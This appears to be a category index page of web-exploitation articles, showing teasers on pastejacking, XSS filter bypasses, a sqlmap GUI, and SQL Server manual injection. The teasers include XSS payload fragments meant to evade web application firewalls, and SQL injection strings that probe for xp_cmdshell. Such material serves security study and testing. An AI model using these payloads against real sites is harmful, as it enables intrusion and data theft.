Category: Web Exploitation

pastejacking

Pastejacking: Attack vector

Browsers now allow developers to automatically add content to a user’s clipboard, following certain conditions. Namely, this can only be triggered by browser events. This post details how you can...

Bypassing XSS filters

In the XSS world, there are many tags, events, attributes can be used to execute js. Tag can execute js <script> <a> <p> <img> <body> <button> <var> <div> <iframe> <object>...

SQLMAP-Web-GUI | GUI for sqlmap

To interesting resources was presented sqlmap-the Web-the GUI . This is a GUI for the program sqlmap (designed to analyze web applications on the SQL-inject). Installing SQLMAP-Web-GUI on Kali Linux...

Cross site scripting payload for fuzzing

Collected some of the more useful XSS payload, used to bypass the waf and some applications: <sCrIpt>alert(1)</ScRipt> \<iMg srC=1 lAnGuAGE=VbS oNeRroR=mSgbOx(1)> <img src=’1′ onerror\x00=alert(0) /> <img src=’1′ onerror/=alert(0) /> <img...

Comprehensive SQL Server manual injection Tutorial

Get basic information Judgment branch does not support stack query: ;declare @d int– ;select count(*) from sysobjects–To determine whether the station library separation: and 1=(@@servername%2b’|’%2bhost_name())–Determine if XP_CMDSHELL exists: and 1=(Select...